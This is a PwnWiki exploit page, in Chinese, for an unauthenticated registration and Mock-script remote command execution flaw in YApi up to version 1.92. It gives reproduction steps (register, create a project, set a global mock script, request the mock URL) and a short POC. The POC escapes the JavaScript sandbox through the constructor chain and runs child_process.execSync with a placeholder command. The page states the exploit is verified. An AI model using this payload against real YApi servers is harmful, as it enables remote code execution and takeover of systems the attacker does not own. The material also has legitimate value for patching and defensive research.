YApi 未授权用户创建&Mock远程命令执行漏洞

From PwnWiki
Revision as of 20:25, 8 July 2021 by Pwnwiki (talk | contribs) (Created page with "YApi 未授权用户创建&Mock远程命令执行漏洞")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎中文(中国大陆)‎ • ‎中文(繁體)‎
Check.png 该漏洞已通过验证

本页面的EXP/POC/Payload经测试可用,漏洞已经成功复现。

影响版本

<=V1.92 All

漏洞复现

登录注册后,创建一个项目

124460388-eaa46100-ddc1-11eb-80c4-2bddb97df8e1.png

然後選擇設置全局的mock腳本,設置命令為遠程訪問我的服務器地址。

124460511-090a5c80-ddc2-11eb-92f6-46c9b3b498bb.png

添加接口,訪問接口的mock地址

124460629-2dfecf80-ddc2-11eb-98c3-b96f7174d8f1.png

服務器可以看到如下響應

124460757-5686c980-ddc2-11eb-87df-09e0f9ac08af.png


POC

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockjson = process.mainModule.require("child_process").execSync("command").toString()

參考

https://github.com/YMFE/yapi/issues/2233

Retrieved from "https://pwnwiki.com/index.php?title=YApi_未授權用戶創建%26Mock遠程命令執行漏洞/zh-cn&oldid=6549"